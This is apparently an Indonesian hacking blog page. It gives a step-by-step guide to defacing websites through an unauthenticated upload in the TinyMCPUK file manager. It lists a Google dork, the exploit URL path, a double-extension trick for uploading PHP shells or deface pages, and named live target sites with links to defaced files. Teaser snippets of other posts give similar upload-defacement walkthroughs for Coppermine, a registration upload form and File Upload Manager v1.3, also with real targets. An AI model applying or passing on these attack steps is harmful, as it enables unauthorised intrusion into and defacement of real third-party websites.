Langsung ke konten utama

Deface Tinymcpuk mediatech



Kembali lagi dengan Sayah; v
Oke aja langsung gasken ke tutor nyah;v

Bahan & Alat
1. Hp/pc
2. Browser kesayangan
3. Dork : All rights reserved. © 2015 Media Tech Indonesia
4. Exploit : /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
5. Shell/Script deface. Extensi tambahin .fla

HTML : asw.htm.fla
PHP : asw.php.fla

Live Target
http://www.rentalmobilsurabaya.org/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Langkah-langkah :
1. Dorking dulu lah sampe nemu target, buat belajar tu diatas ada live.

2. Udah nemu target? Masukkin exploitnya, contoh :

target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

3. Lihat bawah......
Ada tuh tempat upload, ya udah tinggal upload, mau shell/script deface, w nitip aja yak :v ya kerna emang ga support php cuk :'v

4. Jika sudah upload, tinggal panggil scriptnya seperti ini.

target.com/tinymcpuk/gambar/Flash/asw.php.fla

Hasil :
http://www.rentalmobilsurabaya.org/tinymcpuk/gambar/Flash/tt.htm.fla

Sekian ae ya cuk :v

Komentar

Postingan populer dari blog ini

Deface Frontend Register Upload + Live Target

Deface Frontend Register Upload + Live Target Bahan-bahan: • HP/PC • Kuota • Jembud (wajib) • Browser Kesayangan • Dork + inurl:/index.php/en/147/featured • Script deface + Ext: .txt (gabisa up .html) Langkah-langkah: - Dorking dulu lah sono, sampe nemu target. - Masuk ke salah satu web, lalu cari tempat Login/Registrasi (Cari tombolnya cuk) - Registrasi dulu, inget username sama Password nya. - Udah registrasi? Login lah. Terus klik "My Profile" - Scroll kebawah, add file. - Pencet lama kaca pembesar, buka di tab baru (PC klik kanan) Atau bisa juga gini. xnxx.go.id/files/tod.txt Done! Live Target + http://www.ozpropertysale.com.au/index.php/en/147/featured Hasil. + http://www.ozpropertysale.com.au/files/duar.txt # sumber dari misetong padahal dia juga liat ya , kan kontol

Deface Coppermine Photo Gallery File Upload

 Deface Coppermine Photo Gallery File Upload Bahan-bahan • Dork : intext:"Powered by Coppermine Photo Gallery" intitle:Upload file • Script deface .txt • Browser kesayangan Langkah-langkah • Dork lah anjg, pake dork diatas, kebiasaan lu gimana kalo nyari target • Pilih salah satu target, ntar ada tempat upload, ya udah upload aja cuk. • Upload sampe sukses.. Udah?? • Akses file xnxx.go.id/[path]/albums/userpics/ppk.txt Udah su kelar. Live Target • http://www.kunstpicknicken.nl/fotoboek/upload.php Hasil • http://www.kunstpicknicken.nl/fotoboek/albums/userpics/randi.txt # Misetong

Deface Dengan File Upload Manager v1.3 Rename To

Deface File Upload Manager v1.3 Rename To Oke karna saya gak bisa banyak bacot langsung aja gasken ke tutor nya Siapkan: **Bahan Bahannya • Dork "File Upload Manager v1.3" "rename to" "file types allowed" • Script Deface Ex : htm , txt Contoh Script : tutorial.htm Dorking dulu di google seperti biasa! Contoh web vuln ada form uploadnya seperti gambar di bawah! • Langsung upload aja ! 4. Langsung upload aja gan! Kalo seperti dalam gambar itu berarti sukses:) Cara liat hasilnya gmna?? Mudah banget! • sitetarget.co.il/[path]/store/namafile.htm Contoh: •  https://filesmarcinx125.prv.pl/store/eue.htm # terimakasih sudah mampir ke blog ku:) # semoga sehat selalu